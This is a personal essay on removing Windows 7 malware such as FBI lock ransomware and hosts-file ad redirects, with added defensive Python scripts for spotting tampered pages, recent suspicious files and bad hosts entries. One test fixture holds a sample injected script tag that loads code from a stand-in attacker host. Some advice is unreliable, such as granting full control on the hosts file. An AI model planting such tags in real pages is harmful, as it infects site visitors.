Virus recovery in Windows 7
FBI lock virus, Adobe install virus, Yield.manager popup ads and more
--------------------------------------------------------------------------
                   created 12/27/12
                    updated 8/29/15

        A comprehensive essay on virus recovery in Windows 7 based on my own hard-won experience.

My related essay on Windows 7 is here: XP to Windows 7 'Upgrade', What a Freaking Nightmare
F8 (Safe mode) --- Power down first (important). With my desktop HP machine F8 does nothing with a 'Restart' boot.
F11 (Recovery menu), F9 (Diagnostics)

Introduction
       This is an essay about how to recover from (Windows) virus attacks. This essay is unusual in that it is not written by some so-called virus expert, but by someone who has been repeatedly attacked by different viruses and recovered every time, and who has written up what worked for him. In 2013 I was attacked by so many different viruses with different levels of sophistication that I learned a bunch of different ways to recover. What worked in the beginning, say for the FBI lock virus, stopped working as the viruses got more sophisticated and began blocking access to Safe Mode and Task Manager. At one point my homepage came under attack, and several times it was flagged by Google ('this site may harm your computer'), but with time I learned how a virus was inserting JavaScript into my page and closed the door.

(update 8/29/15)
        The burst of virus attacks described in this essay lasted for many months and then just stopped. I'm pretty sure changing my FTP password was the key to protecting my homepage on remote servers, but what exactly stopped the virus attacks on my OS I don't know. Maybe it was related to the FTP password change, or to a change in my Windows installation (with Windows updates shut down), or to something else, but one thing is certain. It is now about two years later and there is no doubt that virus attacks on my OS and homepage are a thing of the past. (And, as I always have, I don't run an anti-virus program in the background.)

My anti-malware programs and tools

FBI Lock virus recovery
        Overview . Details . updates

FBI lock variant that disables Safe mode
        Overview . Details . Recovery using System Restore (update)
        Depending on System Restore (update)

Yield.manager popup ads recovery
        Overview . Details

Fake Adobe Flash Player Install popup
        Overview . Details

Softonic toolbar viruses: 'IB Updater' and 'Incredibar'
    and SweetIM, SweetPacks (redirect) toolbars
        Overview . Details

Repair virus damaged files with built-in tool 'System File Checker'
        Overview . Details

Boot failure, system crashes
        Overview . Details

Windows repair
        Overview . Details

Windows reinstall and disk options
        Overview . Details

Safe mode with no icons
        How to navigate in the 'black' Safe mode screen
Flash cookies
Overview of several virus fixes

Did a trojan virus cause my computer crash?
--------------------------------------------------------
Google warns my (online) home page is infected, and I confirm Google is right (9/22/13)
        My homepage files on my server (Comcast) had been modified. They were no longer the same as on my home machine. I found all the .htm files there with (malicious) JavaScript code wedged into them. This wedged code causes Google to identify my homepage as 'may harm your computer', and I can see from the source code that the wedged code is calling a JavaScript file from various URLs (different each attack) from outside the USA that are identified with viruses. (What this virus code does, I have no idea!)
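One way to catch this kind of tampering early, as an added example that is not part of the original essay: the Python script below compares the master copy of each page kept on the home machine with the copy fetched from the server, and for any page whose hash differs it lists the hosts that `<script src=...>` tags load from that are not on a trusted list, which is where wedged loaders point. The page contents, the `.invalid` and `.example` hostnames and the trusted-host set are constructed sample data; nothing here is taken from the author's site, and fetching the served copies (by FTP or HTTP) is left to the caller.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSrcCollector(HTMLParser):
    """Collects the host part of every <script src="..."> in a page."""

    def __init__(self):
        super().__init__()
        self.script_hosts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            host = urlparse(src).netloc.lower()
            if host:                 # a relative src has no host: it is one of our own scripts
                self.script_hosts.append(host)


def sha256_of(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def find_tampered_pages(local_pages, served_pages, trusted_hosts):
    """Compare the master copy of each page with the copy fetched from the server.

    local_pages / served_pages: {filename: html text}.  A page is reported when
    its hash differs (or it is missing); the report also lists every script host
    in the served copy that is not in trusted_hosts."""
    report = {}
    for name, master in local_pages.items():
        served = served_pages.get(name)
        if served is None:
            report[name] = {"status": "missing on server", "foreign_script_hosts": []}
            continue
        if sha256_of(served) == sha256_of(master):
            continue                 # byte-identical: nothing to look at
        collector = ScriptSrcCollector()
        collector.feed(served)
        foreign = sorted({h for h in collector.script_hosts if h not in trusted_hosts})
        report[name] = {"status": "modified", "foreign_script_hosts": foreign}
    return report


# Constructed sample data (not the author's real pages).  The served copy of
# index.htm has a script tag wedged in before </body>, as the essay describes;
# about.htm is untouched.
LOCAL_PAGES = {
    "index.htm": "<html><body><h1>Home</h1><script src=\"menu.js\"></script></body></html>\n",
    "about.htm": "<html><body><p>About me</p></body></html>\n",
}
SERVED_PAGES = {
    "index.htm": LOCAL_PAGES["index.htm"].replace(
        "</body>", "<script src=\"http://loader.example.invalid/x.js\"></script></body>"),
    "about.htm": LOCAL_PAGES["about.htm"],
}
TRUSTED_HOSTS = {"www.example.com"}   # hosts our own pages may legitimately load scripts from


if __name__ == "__main__":
    for page, info in find_tampered_pages(LOCAL_PAGES, SERVED_PAGES, TRUSTED_HOSTS).items():
        print(page, info["status"], "foreign script hosts:", info["foreign_script_hosts"])
```

Run it after every upload and again on a schedule; a hash mismatch on a page you did not edit is the signal, and the foreign host list tells you what the wedged code is pulling in.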

        This was a three month battle with repeated infections, but eventually I defeated my homepage attacking virus.
        No more homepage infections (12/25/13)
         'This site may harm your computer' (9/22/13)
         My homepage is infected again (and again)! (10/4/13 -  11/5/13)
         Homepage virus attacks defeated (12/25/13)

         How to put up a homepage
--------------------------------------------------------

        I have been hit by a bunch of nasty viruses and popup ads in late 2012 and early 2013 on my Windows 7 desktop, with the result that I am now quite good at getting rid of them. I've recovered every time using a bunch of different methods, so I have written up a guide (largely for me) on how to do it. The repeat attacker has been the FBI lock virus (the press calls it 'ransomware'), which has hit me well over ten times. I became quite expert in cleaning it off my machine, and in all my most recent attacks I have been hit by a new and much nastier variant of it that blocks access to Safe mode. After months of virus attacks, I had a system crash and boot failure that I now suspect may have been caused by a trojan virus.

        In this essay I first list the tools I have found most useful, then give an overview of the viruses I got hit with and how I removed them, including detailed contemporaneous notes as I worked to remove each virus. I also detail a very useful tool, 'System File Checker', I discovered built into Windows 7 (and Windows 8 too) that can repair virus damage to Windows files. Finally I discuss the evidence that a virus may have crashed my machine and damaged Windows files on my hard drive.

System Restore workaround (April 2013)
        After almost six months of battling (mostly) the FBI lock virus, I have become very careful to check daily that Microsoft System Restore always has a few restore points. I check daily because restore points randomly (and frequently) disappear. If I have less than three restore points, I create new ones. To make this process quick and easy I have two shortcuts on my desktop. One just calls Windows System Restore. This allows me to check how many restore points there are. The other shortcut runs a little script I got off the web that makes a new restore point (which I can name) in 30 sec to 1 min. The workaround for this buggy mess is necessary because:

        a) System Restore in Windows 7 is the only reliable way to regain control of your computer when the attack is by some (newer) versions of the FBI lock virus that disable Safe mode. Restore points are essential: if System Restore has no restore points, your best virus fighter is lost; it won't run.

        b) System Restore in Windows 7 is a buggy mess. The bug is that its restore points randomly and frequently disappear. If it has any restore points (hopefully not too old), I find it to be a reliable way to disable the virus and regain control. All System Restore does is delete any .exe files on the hard drive installed since the restore point. This is enough to disable the FBI virus because its executable file is always an .exe file. However, System Restore does not clean up all the other stuff the virus sprays into your hard drive and registry. But if you noted the time of the attack and have a good search utility, like Agent Ransack, once you regain control you can track down the virus fragments and delete them. If you haven't installed any new programs since the restore point was established, System Restore won't do anything bad to your machine. If you have, then these recent program(s) will need to be reinstalled.

My anti-malware programs and tools
        I don't have any of the standard anti-virus programs (Norton, Kaspersky, McAfee) on my machine. However, I do have the highly regarded free version of Malwarebytes anti-virus installed, and I have come to depend on it. It provides some degree of real time protection, but it is most useful as a clean up tool. Its database updates frequently, and while it may not block a virus file from loading, it does usually log it. With this information not only can the virus files be cleaned off the machine, but the file time of one virus file allows any related virus fragments to be tracked down and deleted.

        (update) While Malwarebytes anti-malware worked reliably for months against the FBI stop virus, detecting nearly every attack, and while I keep its database updated, I have not found it at all useful in the last few months. The reason is the new, more sophisticated FBI stop virus blocks access to Safe mode, and that means there is no way to run it. (I should check their site to see if there is any way to access it via a flash drive during a virus attack, but I doubt it.) After recovering with System Restore, a look at files written just prior to the attack shows that Malwarebytes is not logging the virus attack as it did previously, so it's probably no longer seeing the virus .exe file download in real time.
        From what I read online I seem to do manual virus cleanup differently from everyone else. When I am attacked, I note the time of the attack. With this information and a good free search program (Agent Ransack) I can track down and delete the cluster of virus files that generally load at the same time. Since anti-malware programs often don't find all of the virus files, I usually note the location, look it up in Explorer to find the time, do a time window search to find related virus files, then delete them all manually.

Key tools
        Malwarebytes Anti-malware (free version)        --- Anti-virus, virus detection in 3 min scan, real time virus load logging
        Agent Ransack from MythicSoft (free)            --- Search utility, time window searches, displays file times to the second
        System File Checker (built into Windows)        --- Microsoft tool, checks and automatically repairs system files
        HijackThis from Trend Micro (free)              --- Checks 'hosts' file for yield.manager ad corruption in two seconds
        System Restore (built into Windows)             --- Microsoft tool that removes .exe files installed after a 'restore point'
                                                            (Powerful tool, but very buggy in Windows 7: restore points
                                                            'magically' disappear, so they need to be regularly created)

Secondary tools
        HouseCall from Trend Micro (free)                       --- Anti virus (5 min scan)
        HitmanPro Anti-malware from SurfRight (free)            --- Anti virus (free version will only detect, not repair)
        Spybot Search and Destroy from Safer-Networking (free)  --- Anti virus (I rarely use this)
        CCleaner from PiriForm (free)                           --- Cleans up, quickly deletes lots of history and temp files

        I have found that Malwarebytes, HitmanPro, and HouseCall each found a trojan that the other two had missed, so to really clean your machine, running several anti-malware tools is a good idea.

FBI Lock virus recovery
Another new FBI variant (update Aug 18, 2013)
        After several months with no FBI attacks, I have recently been hit twice with what appears to be a new variant of the FBI virus. The distinguishing feature here is that no .exe file can be found. Like the original FBI virus, this variant does not block a boot (F8) into Safe mode. However, this time the virus has been modified to hide and prevent the usual recovery tools from finding it. Malwarebytes Anti-Malware is defeated by this variant. A Malwarebytes scan in Safe mode just after an attack reports no problems. The casual user dependent on Malwarebytes is screwed. My search of the last 10 minutes before the attack did not turn up any .exe (virus) file to delete.

        I don't know what would happen if recovery was attempted using only System Restore, which has been the primary means of recovery for the variant that blocks Safe mode. My understanding is that all System Restore does is remove recent .exe files. If the .exe came in earlier, it would work, but if the .exe is somehow hidden it might not. In this last attack I had only minutes before switched to a new browsing site, so my guess is that it was the source of the virus, and there was likely no earlier .exe download.
        The good news is I have been able to recover from both attacks by this variant using my file search utility Agent Ransack running in Safe mode. I delete suspicious files found in the last 10 min, though being careful causes this to be a slow process (1 hr). Most files written while online (about 200 or so show up in a ten minute interval!) are clearly deletable, most being temp files (.tmp) and prefetch files (.pf), but there are also update files to logs and file types whose purpose I don't know. A mass deletion would be fast, but I haven't tried it.

Virus files
       In the last attack five files jumped out as almost for sure associated with the virus. All had the same random name. There was a pair of short files [1-2 kb, .bat file and .reg (purpose?)] with two copies in different directories and written just 20 seconds before shutdown. And just 10 seconds before shutdown, probably at the time of the attack, there was a huge (92 Mbyte) .pad file with the same random name. I bet if I had just deleted these five files, I could have recovered, but I like to erase as much of the virus as possible.

        The random name .bat file would likely point to other virus files, but when I tried to read it (with Notepad), Windows would report that a file with a different random name could not be opened. Clearly this file was not normal. I later found a 104 kbyte .bfg file with the reported name written one second earlier than the .bat file, but I was unable to delete it (the OS said it was in use). I suspect this is the .exe file with an altered suffix, since it is the right size and clearly has been hidden. I was, however, able to rename it and change its suffix, but still could not delete it. When I recovered, I searched it out and deleted it. Prior to exiting Safe mode I deleted a bunch of other files written in the last 30 seconds just to be safe.

---------------------------
       Recover: Use Malwarebytes Anti-Malware or manually search for files downloaded just prior to the lockup. (This is for the older FBI lock virus that lets you regain control via Safe mode. For the newer FBI variant that blocks access to Safe mode, see the next section.)

       Without warning the FBI Lock virus throws up a fake FBI screen and totally locks up your machine. This is classic ransomware: 'Send $200 and we will unlock your machine' (then they don't!). According to a Dec 2012 NYT article ransomware has grown into a major worldwide menace with 16 different gangs (apparently mostly in Russia) doing it. I have been hit by this virus repeatedly.

        When the FBI screen appears, it is best to power down immediately and note the time. This virus consists of one or two .exe files (generally the same file with different names in different locations) plus a few shortcuts pointing to the .exe files. All the virus files will have downloaded just before the machine locked up and will have exactly the same file times.

        To recover power up in Safe Mode (hit F8) and run Malwarebytes Anti-Malware. A time window search centered on the time of the files Malwarebytes finds may find additional pieces of the virus Malwarebytes missed. Manual recovery is possible by searching for files written in the minute or two before the machine locked up. Any .exe files in this time window are likely virus files and deleting them will kill the virus. To find more of the virus search again for other files written at the same time as the .exe files.
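The time-window search described here and under 'My anti-malware programs and tools', written out as an added Python example rather than done by hand in Agent Ransack (this is not code from the essay): it walks a directory tree, keeps the files written in a window around the attack time, groups files written together, and keeps only the groups that contain an executable-type file or that share one random basename across extensions, which extends the same idea to the later variant with no visible .exe (the same-name .bat/.reg/.pad files). The directory tree, file names and write times are constructed by `build_sample_tree` purely for demonstration, and the attack time is an arbitrary fixed value; on a real machine you would point `suspicious_files` at `C:\` and pass the noted attack time.

```python
import os
import tempfile
from collections import defaultdict
from datetime import datetime

# Extensions that run or trigger code when opened: the payload itself and the
# shortcuts and registry scripts that point at it.  Prefetch (.pf) files are
# left out on purpose: they only record that something ran.
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".bat", ".cmd", ".lnk", ".reg", ".vbs", ".js"}


def files_in_window(root, attack_time, before_seconds=120, after_seconds=10):
    """Return (path, mtime) for every file under root whose last-write time lies
    between attack_time - before_seconds and attack_time + after_seconds.
    attack_time is epoch seconds: the moment the lock screen appeared."""
    lo, hi = attack_time - before_seconds, attack_time + after_seconds
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                mtime = os.stat(path).st_mtime
            except OSError:
                continue            # vanished or unreadable: skip it, do not abort the scan
            if lo <= mtime <= hi:
                hits.append((path, mtime))
    return sorted(hits, key=lambda hit: hit[1])


def cluster_by_mtime(hits, tolerance_seconds=1.0):
    """Group time-sorted hits whose write times fall within tolerance of the
    previous file: pieces dropped by one download share (almost) the same time."""
    clusters = []
    for path, mtime in hits:
        if clusters and mtime - clusters[-1][-1][1] <= tolerance_seconds:
            clusters[-1].append((path, mtime))
        else:
            clusters.append([(path, mtime)])
    return clusters


def flag_clusters(clusters):
    """Keep clusters that contain an executable-type file, or in which several
    files share one basename with different extensions (the random-name pattern
    of the variant that hides its .exe)."""
    flagged = []
    for cluster in clusters:
        exts_by_stem = defaultdict(set)
        for path, _ in cluster:
            stem, ext = os.path.splitext(os.path.basename(path))
            exts_by_stem[stem.lower()].add(ext.lower())
        all_exts = set().union(*exts_by_stem.values())
        shared_stem = any(len(exts) > 1 for exts in exts_by_stem.values())
        if all_exts & EXECUTABLE_EXTS or shared_stem:
            flagged.append(cluster)
    return flagged


def suspicious_files(root, attack_time):
    """Run the whole pipeline and return the flagged file paths, oldest first."""
    clusters = cluster_by_mtime(files_in_window(root, attack_time))
    return [path for cluster in flag_clusters(clusters) for path, _ in cluster]


def build_sample_tree():
    """Create a throwaway tree of constructed files with chosen write times
    (sample data, not a real infection).  Returns (root, attack_time)."""
    root = tempfile.mkdtemp(prefix="lock_virus_demo_")
    attack_time = 1356400000.0          # arbitrary fixed epoch value
    sample = {                          # relative path -> seconds before the lock-up
        "Users/me/AppData/Local/Temp/kqzv7.exe": 30,
        "Users/me/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/kqzv7.lnk": 30,
        "Windows/Prefetch/EXPLORER.EXE-A1B2C3D4.pf": 25,   # benign noise inside the window
        "Users/me/AppData/Local/Temp/h3x9qa.bat": 20,     # same random stem, two extensions
        "Users/me/AppData/Local/Temp/h3x9qa.reg": 20,
        "Users/me/Documents/notes.txt": 3600,             # an hour earlier: outside the window
    }
    for rel, age in sample.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(b"x")
        os.utime(path, (attack_time - age, attack_time - age))
    return root, attack_time


if __name__ == "__main__":
    root, attack_time = build_sample_tree()
    for path in suspicious_files(root, attack_time):
        stamp = datetime.fromtimestamp(os.stat(path).st_mtime)
        print(stamp.strftime("%Y-%m-%d %H:%M:%S"), path)
```

Widen `before_seconds` when the log shows an earlier .exe download (the essay later notes one that arrived 19 minutes ahead of the rest), and treat the output as a list to review, not to delete blindly: legitimate log and temp files land in the same window.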

FBI lock variant that disables Safe mode (Dec 24, 2012)
        Recovery from this new, nastier, more advanced variant of the FBI lock virus is much more difficult than with the 'classic' FBI lock virus. The reason is this variant prevents you from rebooting (F8) into Safe mode, so the usual way of regaining control is blocked. I have been hit by this variant only once (no longer true), and I did manage to recover, but the procedure I used was long and winding. I am hoping there is a simpler way.

       Recover: I have come to depend more and more on the Microsoft built-in tool, System Restore, to recover. The first time I recovered I used the long sequence of steps here, but below is a summary:

        I booted with Windows recovery disks and ran one of its tools: Startup repair. I found I could then boot (F8) into 'Safe mode with command prompt', where I ran System File Checker. After this, I found Ctrl-Alt-Del interrupt was now working (it had been previously disabled by the virus), so I could get to Task Manager and from there to Explorer with the ability to run anti-malware tools. Next time I would try the following shortcut:

        Try booting (F8) directly into 'Safe mode with command prompt'. It's possible that the virus doesn't block this mode. If this works, then see if Ctrl-Alt-Del will get you to Task Manager, or type 'exit' and then try Ctrl-Alt-Del. If these shortcuts don't work, then the recovery tools (Startup Repair and/or System File Checker) must be doing some good and helping with the recovery.
Alternative approach -- System Restore
        An alternate approach to recovery that I didn't try is to run the System Restore tool from Windows recovery disks. This tool is not very reliable in Windows 7, my experience is that it often fails, but still it has saved me a couple of times. Of course you need to have a restore point available to even attempt it, and one of the problems with System Restore in Windows 7 is that restore points have a way of 'magically' disappearing.

        Once System Restore saved me from a nasty FBI lock virus that blocked Safe mode, I then began to create restore points and monitor them. I had one, two, three, then four restore points. I see the same four points for a while, and then I check again a few days later (system clean during this time), and I find my latest three restore points are gone! I am left with just one created over two weeks ago. On top of that, this is Tuesday, and on Sunday another restore point should have been created when Windows auto-backup runs. A scan for affected programs with this old restore point tells me that four program updates will be removed and replaced by their old versions, which it warns may not run correctly. You've got to keep making and checking restore points to get this buggy, but useful, tool to work. To make this easier I have shortcuts on my desktop to do both jobs.

Check for earlier virus file downloads
        The .exe file of this FBI lock variant can be more difficult to find than is usually the case. The reason is that with this variant all the virus files may not download at the same time. I found (using the MalwareBytes log) that my virus .exe file had downloaded 19 minutes before the machine locked up when the rest of the virus files came in, so check the MalwareBytes log to see if it caught any earlier file downloads.

Recovery using System Restore (update 12/31/12) (update 1/20/12)
        I got hit again, several times, by a variant of the FBI lock virus that disables Safe mode, and each time I was able to recover using System Restore. The first time it didn't work cleanly (in subsequent attacks it was clean), but it did restore my machine to normal operation without affecting my files. This was a new variant of the FBI lock virus I had not seen before. Its lock screen says, "Internet Crime Complaint Center", and it very effectively blocked access to Safe mode. I tried my idea of booting into 'Safe Mode with Command Prompt' to see if I could get from there to Task Manager using the Ctrl-Alt-Del interrupt, but it didn't work. Unlike before, Ctrl-Alt-Del worked, but Task Manager was missing from the list of options.

        I tried to get from the Safe mode select screen to Safe Mode (don't know if by design this is possible), but couldn't do it, so I booted into the HP Recovery screen with F11. I had several restore points within the last two days (I have been creating them with a shortcut on my desktop) and chose one from the day before, when anti-malware had reported a clean system. I had earlier in the day tried System Restore when my system was clean and it had rolled back OK. But this time System Restore, as it had done with my system crash a week earlier, threw an error message that it was not successful, telling me it had failed due to an error and had not changed any system files (below left). I just closed the message box hoping the error was bogus, and it was! The system automatically restarted and up came my normal desktop with a new message that System Restore had successfully restored my system to an earlier time. Ah, yes, Microsoft in action...

[Figure: two screen captures] Windows 7 System Recovery on ending threw the error message at left, followed a minute later by the message at right!
(screen captures 12/30/12 with my tablet computer camera)

Depending on System Restore (1/20/13)
       My latest experience with the FBI lock virus is that it has mutated. All my recent FBI attacks have been the variant that blocks access to Safe mode. So with this more difficult version, my principal means of recovery, after verifying that a Safe mode boot (F8) does not provide access to recovery tools, is to go straight into (F11) System Restore. Three or (four) times now this has saved me, removing the virus .exe file (or files) and restoring my normal desktop. A System Restore virus recovery does leave behind some virus files (lock screen and html files pulling it together), but with the virus .exe files removed, they are harmless.

        Since System Restore in Windows 7 is buggy, I am now careful to monitor that I have restore points, because they have a way of magically disappearing, and if you have no restore points when the virus hits you are sunk! To speed this up I have a shortcut on my desktop to open System Restore (to check for restore points), and another shortcut allows me to quickly create a restore point. The code for the script to create a restore point is online (search: 'CreateRestorePoint.vbs'), and I can verify these restore points are as good as any and will work.

System Restore 'affected files'
       Before running System Restore I asked it to check for 'affected files'. As I now understand how System Restore works, it should have identified any .exe file that it was about to (effectively) delete. The only .exe file installed after the restore point the previous day would be the virus .exe. Yet here is where it gets peculiar: System Restore reported no files would be affected by the roll back. This is obviously wrong. System Restore has no way of knowing that the .exe virus file was not installed by me.

        The only thing I can think of is that System Restore only checks file times in the two main Program Files directories. And in my experience, while the virus .exe file is out there in the open, it is in an unusual place for a .exe file, running out of the c:\user directory.

        Well, after playing around with System Restore a little more, I have another thought. I suspect all it does in its scan is look at the list of installed programs that Windows keeps and check these dates. I ran a test making a dummy .exe file in c:\temp, and it was not found. If I am right that it looks at only the list of installed programs, then it is never going to see a virus file.

Checking out files after System Restore
       With my system now working (and rolled back less than 24 hours) it gave me an opportunity to see what my files now looked like. I knew of two changes in my files in the last day. In recent hours I had edited an .html file that is part of my home page, and, of course, I knew from experience that the virus had (almost for sure) downloaded one (or more) .exe files along with several support files. How, I wondered, could System Restore preserve my personal data file changes and yet remove the virus non-.exe files? The answer I found is it can't! It leaves them all alone.

        The first thing I did was to run Malwarebytes anti-malware on the restored machine, and it found nothing. I then searched with Agent Ransack for files written in the last few minutes, looking for virus files. On a quick look I don't see any, which would be consistent with the Malwarebytes report. The time search window has no .exe file nor any Malwarebytes log entry that would allow me to look for an .exe download at an earlier time. But I do notice a small image file (img[1].png) written in the final seconds preceding the lock. I look at it with my photo viewer and find it is a small part of the lock screen (my URL). Notepad shows the three small .htm files (with names like 'index.htm' and 'mp.htm') are more virus fragments that are assembling the lock screen.

Hiding virus files with earlier file times?
       In all my months of chasing down virus files I have never found the main image files that make up the lock screen. In this case the .htm files gave the names of the called images (names like 'bg.jpg' and 'mp.png'), so I searched for them. And son of a gun, the results were interesting. I found the lock image pieces had file times that were months earlier (and all different). No wonder that my time sensitive virus file searches around the time of lockup never found them. It seems like putting 'wrong' times on files is a way of hiding them, but I don't see how this does much good when it is only the lock screen. (Maybe being saved for a future attack?)

        The reason I am nearly positive the lock screen files (.htm and image) have just been downloaded is that while I was trying various recovery techniques (before System Restore) the FBI lock screen had popped up several times. I found four different subdirectories (5-10 minutes apart) with the same lock image files. And this is the first attack in which I had ever seen this particular lock screen. The image subdirectories were located here:

        c:\user\windows_7\Appdata\local\temp\7540.tmp (example)\(htm files here)\img\(image files here)

        I manually cleaned out all the support virus fragments. While the .exe virus file was missing, I think I know its name, because there was a .pf (prefetch) file, which in the past I have seen encode the virus .exe filename, and it was here named SPGNKY5.exe (random).pf. It has one Google hit as a suspicious element.

Take computer offline?
       So it sure looks like (with this variant anyway) every time the FBI lock screen pops up its screen files have just been downloaded from the internet. Some people online had claimed that taking your machine offline (say, removing power to the cable modem) might aid in recovering. My findings indicate this might be worth a try. However, I will be surprised if it works because 1) once you see the virus lock screen a copy of the screen files is already on your hard drive, and 2) it's quite unlikely that just killing the lock screen would re-enable the keyboard or mouse.

Tried it (twice) -- doesn't work (1/20/13 update)
        On a subsequent FBI lock attack I tried this method, taking the computer offline, and it didn't work. When the FBI lock screen popped up, the first thing I did was power down my cable modem. But when I powered down then up, the computer was still locked and the FBI lock screen still popped up. This virus recovery method doesn't work (at least with the latest variant of the FBI lock virus that also disables Safe mode).

So how does System Restore work?
      It looks like what System Restore does is remove .exe files (probably all 'application' files) with file times after the restore point time. I found my .html file edited after the restore time had not been touched; the recent changes were there. And, not surprisingly, I found that while there was no .exe virus file, which explains why my machine was no longer locked up, I located about ten virus fragments that had just downloaded, none of which Malwarebytes found.

        Microsoft has a page called 'What type of files does System Restore change?' that gives this non-technical explanation (below). Note this explanation says nothing about .html files, which are sort of a developer file, but also sort of an executable file as far as a browser is concerned. My experience is that .html files are not changed. I found a forum discussion confirming this, saying that System Restore changes .exe files but not .html files.

        "System Restore can make changes to Windows system files, registry settings, and programs installed on your computer. It also can make changes to scripts, batch files, and other types of executable files on your computer.  Personal files, such as documents, email, photos, and music files, are not changed.

        For example, if you download a personal file, such as a photo from a digital camera, on a Friday and then restore your computer to the state it was in two days earlier on Wednesday, the photo will still be on your computer. However, if you install a photo viewing program on a Friday and then restore your computer to the state it was in two days earlier on Wednesday, System Restore will uninstall the program, and you won't be able to use that program to view photos."

Puts back 'old' .exe files
       In addition to removing newly installed '.exe' files it (apparently) puts back 'old' .exe files. In a 'scan for affected programs' with a two week old restore point it lists four recent upgrades of anti-malware and browsers that it will remove and older revisions that it says it will put back (restore). It then warns the old versions may not work correctly, which of course is quite likely if only the .exe file of a complex program is being replaced.

Yield.manager popup ads recovery
        Recover: Most anti-malware software can't touch the yield.manager family of aggressive popup ads. The key to getting rid of these popup ads is to fix the (hidden) system 'hosts' file that the virus has changed.

                    c:\windows\system32\drivers\etc\hosts                   (no extension)

        This text file is part of the 'Domain Name' system, and lines added to it by the virus cause the browser to redirect to the sites listed there to pull the ad contents. The virus adds a handful of lines far down at the end that need to be deleted. The editing is easy using Notepad, but getting Windows to allow you to overwrite the corrupted file is tricky, because the virus has also tightened the file's permissions. I read online that running the Notepad editor 'as administrator' will do the trick, but in my experience (and the experience of others) this may not be enough; it is also necessary to follow a procedure to open the file's properties and loosen its permissions, as shown below:

            1) Change 'hosts' file properties first
                   Properties, Security ("Authenticated Users"), Edit, Full Control, Apply, then unclick Read-only
            2) Notepad (Run as Administrator) can now overwrite 'hosts'
            3) May need to save the file as "hosts" (with quotes)          (so it won't save as 'hosts.txt')
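An added Python example (not from the essay, and not how HijackThis does it) of the hosts-file check itself: it parses the file, flags entries that map a name to a non-loopback address (the redirect lines the infection appends) as well as non-standard names pinned to loopback (a trick used to black-hole anti-malware update sites), and returns a cleaned copy ready to be written back by the procedure above. `SAMPLE_HOSTS` is constructed: the comment header of a stock Windows 7 hosts file followed by made-up entries using documentation IP ranges and placeholder names.

```python
import ipaddress

LOOPBACK_ADDRESSES = {"127.0.0.1", "::1", "0.0.0.0"}
# Names a stock Windows hosts file may legitimately point at loopback.
STANDARD_LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}


def parse_hosts(text):
    """Return (line_no, address, [names]) for each active entry.  Comments and
    blank lines are skipped; an entry whose first field is not an IP address is
    returned with address None so the caller can flag it."""
    entries = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        body = raw.split("#", 1)[0].strip()
        if not body:
            continue
        fields = body.split()
        address, names = fields[0], [n.lower() for n in fields[1:]]
        try:
            ipaddress.ip_address(address)
        except ValueError:
            address = None
        entries.append((line_no, address, names))
    return entries


def suspicious_entries(text):
    """Return (line_no, reason) for every entry that does not belong in a clean
    file: a name sent to any non-loopback address (an ad or malware redirect),
    or a non-standard name pinned to loopback (blocks that site, e.g. updates)."""
    flagged = []
    for line_no, address, names in parse_hosts(text):
        if address is None:
            flagged.append((line_no, "not an IP address"))
        elif address not in LOOPBACK_ADDRESSES:
            flagged.append((line_no, "redirects to non-local address " + address))
        elif any(n not in STANDARD_LOCAL_NAMES for n in names):
            flagged.append((line_no, "non-standard name pinned to loopback"))
    return flagged


def cleaned_hosts(text):
    """Return the file text with every flagged line removed, ready to be written
    back (as administrator, saved as "hosts" with quotes so Notepad does not
    append .txt)."""
    bad = {line_no for line_no, _ in suspicious_entries(text)}
    kept = [raw for n, raw in enumerate(text.splitlines(), 1) if n not in bad]
    return "\n".join(kept) + "\n"


# Constructed sample: a Windows 7 style comment header followed by three lines of
# the kind the infection appends (documentation IP ranges, placeholder names).
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
#\t127.0.0.1       localhost
#\t::1             localhost
127.0.0.1 localhost
203.0.113.7   ads.example.net
203.0.113.7   cdn-tracker.example.org
127.0.0.1     updates.antimalware-vendor.example
"""

if __name__ == "__main__":
    for line_no, reason in suspicious_entries(SAMPLE_HOSTS):
        print("line", line_no, ":", reason)
    print(cleaned_hosts(SAMPLE_HOSTS), end="")
```

On a real machine read `c:\windows\system32\drivers\etc\hosts` into `text`, review what `suspicious_entries` reports (a deliberately added entry of your own would be flagged too), and write `cleaned_hosts(text)` back only after loosening the permissions as in step 1.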

        An attack by the Yield.manager virus causes a blizzard of popup ads that overwrite part of the screen (usually the lower left corner). These are not standard popups that the browser can control; these popups are due to changes to the page code made by a virus. Closing one popup just causes a new one to appear in a few seconds to minutes, so browsing is crippled. This virus infection is known to be very difficult to get rid of; most anti-malware tools can't touch it, including my number one anti-malware tool, Malwarebytes Anti-Malware.

Partial fix -- block sites
       Popup ads can be tamed by having your browser block the handful of sites from which the ads are pulled. This is pretty easy to do: you just right click a popup to find its source http address and add it to the browser Block list. On some sites a blocked popup ad window remains transparent, so most of the problem is gone since only the tiny frame close 'x' appears on screen. However, on other sites the window goes opaque, so little is gained.

Fake Adobe Flash Player Install popup
        This virus aggressively and repeatedly throws up an Adobe Flash Install window that is a fake. Malwarebytes Anti-malware identifies the source of this infection as a pair of trojans:

                        'Rootkit.0Access'
                        'Trojan.Dropper.BCMinor'

        I read this virus causes browser redirects, and I know how it does it: I found that my 'hosts' file was modified (with added redirect lines) at exactly the same time as the virus files downloaded.

        Recover: Malwarebytes Anti-malware found and identified this virus, but it had difficulty dealing with it (in normal mode). Using location information from Malwarebytes I tracked down the files it identified and also found two recently installed subdirectories (called 'U' and 'L') with the same time stamp and suspicious looking contents, and deleted them all. I got into Safe mode and again ran Malwarebytes, which now reported I was clean. I have seen no problems since.

Softonic toolbar viruses: 'IB Updater' and 'Incredibar'
